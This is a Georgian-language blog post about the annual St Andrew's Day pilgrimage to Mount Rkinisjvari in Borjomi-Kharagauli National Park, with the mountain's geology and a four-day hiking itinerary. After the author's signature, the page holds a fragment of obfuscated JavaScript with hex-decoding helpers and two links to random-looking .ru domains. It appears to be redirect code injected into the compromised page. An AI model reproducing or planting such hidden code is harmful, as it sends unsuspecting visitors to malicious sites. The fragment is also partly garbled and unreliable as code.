RSS

ანდრიაობა რკინისჯვარზე

14 May

13228020_10154208051804310_1614018097_n12 მაისი ანდრია პირველწოდებულის ხსენების დღეა. იესო ქრისტესგან პირველადწოდებული მოციქულის სახელი ხარაგაულს პირველი საუკუნიდან უკავშირდება. ქრისტიანობის საქადაგებლად საქართველოში შემობრძანებულმა ანდრიამ ხარაგაულში ერთ-ერთ მთაზე აღმართა რკინის ჯვარი, რის გამოც მთას რკინისჯვარს უწოდებენ. ეს მთა ბორჯომ-ხარაგაულის ეროვნულ პარკში, ზღვის დონიდან 2 439 მეტრზე, მდებარეობს.

13219559_10154208051909310_1746945979_nდაბა ხარაგაულიდან ხააგაულის მუნიციპალიტეტის ორგანიზებით და ფინანსური მხარდაჭერით, რკინისჯვარზე ასეულობით მომლოცველი, ანდრია პირველწოდებულის მირონმდინარე ხატთან ერთად, გაეშურა წმინდა ადგილის მოსალოცად. ხარაგაულში ანდრიაობას რკინისჯვარის მოლოცვა ტრადიციად დამკვიდრდა. პირველად, თოთხმეტი წლის წინ, ხარაგაულელი შოთა ხარატიშვილის ინიციატივით, შვიდი მეგობარი გაემგზავრა რკინისჯვარზე ანდრიაობის აღსანიშნავად. „შარშან 130-მა მოვილოცეთ, – იხსენებს ხარაგაულელი შალვა ჩხეიძე, – გვინდა, უფრო მეტად პოპულარული გავხადოთ მთა რკინისჯვარი, რომელიც ნამდვილად გამორჩეულია.“ ხარაგაულის ტურიზმის სამსახურის ხელმძღვანელი ბერიკა თურმანიძე 12 მაისის პილიგრიმულ ტურს ხარაგაულში ტურიზმის განვითარებისთვის ძალიან მნიშვნელოვნად მიიჩნევს.

მომლოცველებმა რკინის ჯვრამდე საკმაოდ რთული და საინტერესო გზა განვლეს. წმინდა ანდრია პირველწოდებულის მირონმდინარე, სასწაულმოქმედ ხატთან ერთად, რკინის ჯვარი სამასამდე ადამიანმა მოილოცა. ილორის წმიდა გიორგის ტაძრის წინამძღვარმა, წმიდა ანდრია პირველწოდებულის ხატთან პარაკლისი აღავლინა, შესრულდა საგალობლები.

13228031_10154208051989310_1128988095_nმთა რკინისჯვარი მდებარეობს  მესხეთის ქედის ჩრდილოეთ განტოტება-რკინისჯვარზე, მდინარე საკრაულის (ხანისწყლისმარჯვენა შენაკადი) ზემოთში. სიმაღლე 2439 მ. აგებულია პალეოგენური ანდეზიტებით, ტუფებითა და ტუფ-ბრექჩიებით. კალთები ციცაბოა, შემოსილია სუბალპური ბალახმცენარეულობით.

ბორჯომ-ხარაგაულის ეროვნულ პარკში ფუნციონიებს ტურისტული ბილიკი: წმინდა ანდრია პირველწოდებულის ბილიკი.  / 54 კმ, 4 დღე, საფეხმავლო და საცხენოსნო, რთული /

მთავარი ღირსშესანიშნაობები: ნიამორების ვოლიერი,შერეული ტყეები, ეროვნული პარკის უმაღლესი მწვერვალი – სამეცხვარიო, მთა რკინის ჯვარი, კოლხური სუბ-ტროპიკული ტყე, ბილიკი იწყება აწყურის მცველთა საგუშაგოსთან (1000 მ. ზღვის დონიდან), ამარათის ტურისტთა, სამეცხვარიოს მცველთა და სახვლარის ტურისტთა თავშესაფრის გავლით სრულდება მარელისის მცველთა თავშესაფართან. (ან პირიქით). ეროვნული პარკის ვიზიტორთა ცენტრიდან აწყურის მცველთა საგუშაგო 27 კმ-ში მდებარეობს. ბილიკის სიგრძე არის 54 კმ. აქ ერთმანეთს ენაცვლება წიწვოვანი ტყეები, ალპური, სუბალპური მდელოები და კოლხური ფართოფოთლოვანი ტყეები. ბილიკის პირველი მონაკვეთი მდინარის ხეობას მიუყვება და შემდეგ ვიწრო ბილიკით ადის მთების ფერდობებზე. დასაწყისიდან 3 საათი ლაშქრობის შემდეგ პირველი პანორამული ხედები გელით, დღის მეორე ნახევარი მთის ფერდობებს მიუყვება რომლებიდანაც შესანიშნავი მცირე კავკასიონის პანორამული ხედები იშლება.

ამარათის ტურისტულ თავშესაფარში ღამისთევის შემდეგ (1900 მ. ზღვის დონიდან) მეორე დღის ლაშქრობა სუბალპურ და ალპურ მდელოებს მიუყვება ეროვნული პარკის უმაღლესი მწვერვალი სამეცხვარიოსაკენ (2642 მ.), სამეცხვარიოს მცველთა თავშესაფარში ღამისთევის შემდეგბილიკი ეშვება ეროვნული პარკის უმაღლესი მწვერვალიდან დაბლა, 19 კმ. მანძილის დაფარვის შემდეგ გზად თქვენ გაივლით მთა რკინის ჯვართან, რომელზეც ლეგენდის თანახმად ანდრია პირველწოდებულმა პირველ საუკუნეში რკინის ჯვარი აღმართა. მესამე დღის ლაშქრობა სრულდება სახვლარის ტურისტულ თავშესაფარში (1025 მ. ზღვის დონიდან), მეოთხე დღეს მარშრუტი მიუყვება მდინარის ხეობას და ყველაზე მარტივია.

შესაძლებელია ერთი ღამისთევის დამატება ქვაზვინევის რეინჯერთა თავშესაფარში./ ან კარვებში.

#2 ანდრია პირველწოდებულის ბილიკი სრულდება მარელისის მცველთა საგუშაგოსთან.

მარშრუტის სავარაუდო განრიგი:

დღე 1: აწყურის მცველთა საგუშაგო – ამარათის ტურისტული თავშესაფარი 16 კმ. საშუალოდ 6-7 საათი, ღამისთევა ტურისტულ თავშესაფარში ან კარავში

დღე 2: ამარათის ტურისტული თავშესაფარი – სამეცხვარიოს მცველთა თავშესაფარი, 9 კმ. საშუალოდ 4-5 საათი. ღამისთევა კარავში ან მცველთა თავშესაფარში (სადაც სამი საწოლია)

დღე 3: სამეცხვარიოს მცველთა თავშესაფარი – სახვლარის ტურისტული თავშესაფარი. 19 კმ. საშუალოდ 7 საათი. ღამისთევა ტურისტულ თავშესაფარში ან კარავში.

დღე 4: სახვლარის ტურისტული თავშესაფარი – მარელისის მცველთა თავშესაფარი. 10 კმ. საშუალოდ 4-5 საათი.

 

 

გიორგი დვალაშვილი

გეოგრაფიის აკადემიური დოქტორი

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ekofact.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://ncnjm3le.ru/f2.html?a=26482https://3oaq3lgf23.ru/u.html?a=26482

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / შეცვლა )

Twitter picture

You are commenting using your Twitter account. Log Out / შეცვლა )

Facebook photo

You are commenting using your Facebook account. Log Out / შეცვლა )

Google+ photo

You are commenting using your Google+ account. Log Out / შეცვლა )

Connecting to %s